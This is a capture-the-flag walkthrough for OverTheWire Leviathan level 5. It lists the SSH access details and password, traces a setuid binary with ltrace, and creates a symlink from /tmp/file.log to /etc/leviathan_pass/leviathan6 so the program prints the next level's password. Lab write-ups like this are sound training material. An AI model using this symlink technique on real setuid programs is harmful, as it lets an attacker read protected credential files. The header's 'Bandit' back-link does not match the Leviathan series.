OverTheWire Leviathan Guide

Previous Level Guide: Bandit Level 4 → 5

Access

SSH: ssh leviathan5@leviathan.labs.overthewire.org -p 2223

Password: i0NHzDwblm

Info

Description: There is no information for this level, intentionally.

Theory

Not much to do with the details from the task, so just skipping to doing it.

Solution

Now, first we will use ls -la to see all files regardless they are hidden and some details of the files/folders:

~$ ls -la
total 36
drwxr-xr-x  2 root       root        4096 Sep 19 07:07 .
drwxr-xr-x 83 root       root        4096 Sep 19 07:09 ..
-rw-r--r--  1 root       root         220 Mar 31  2024 .bash_logout
-rw-r--r--  1 root       root        3771 Mar 31  2024 .bashrc
-r-sr-x---  1 leviathan6 leviathan5 15140 Sep 19 07:07 leviathan5
-rw-r--r--  1 root       root         807 Mar 31  2024 .profile

The only thing here is an executable file called, let's see what it is and use ltrace because why not:

~$ ./leviathan5
Cannot find /tmp/file.log

~$ ltrace ./leviathan5
__libc_start_main(0x804910d, 1, 0xffffd484, 0 <unfinished ...>
fopen("/tmp/file.log", "r")                                               = 0
puts("Cannot find /tmp/file.log"Cannot find /tmp/file.log
)                                         = 26
exit(-1 <no return ...>
+++ exited (status 255) +++

So it seems like the program is trying to read a file, but it doesn't exist, an exploit! We could maybe make a link to the next level's password file, since it's owned by the next level, not only that, but it's also in a temporary folder, so it is literally screaming to be edited/created. So we'll just use the symbolic link with the ln command like in a couple levels ago like this:

~$ ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log

This command doesn't alert us on anything, so let's try the program again to see if it actually gives us the password with this:

~$ ./leviathan5
AL5Hmapwi1

And it worked! Now you can exit and go to the next level.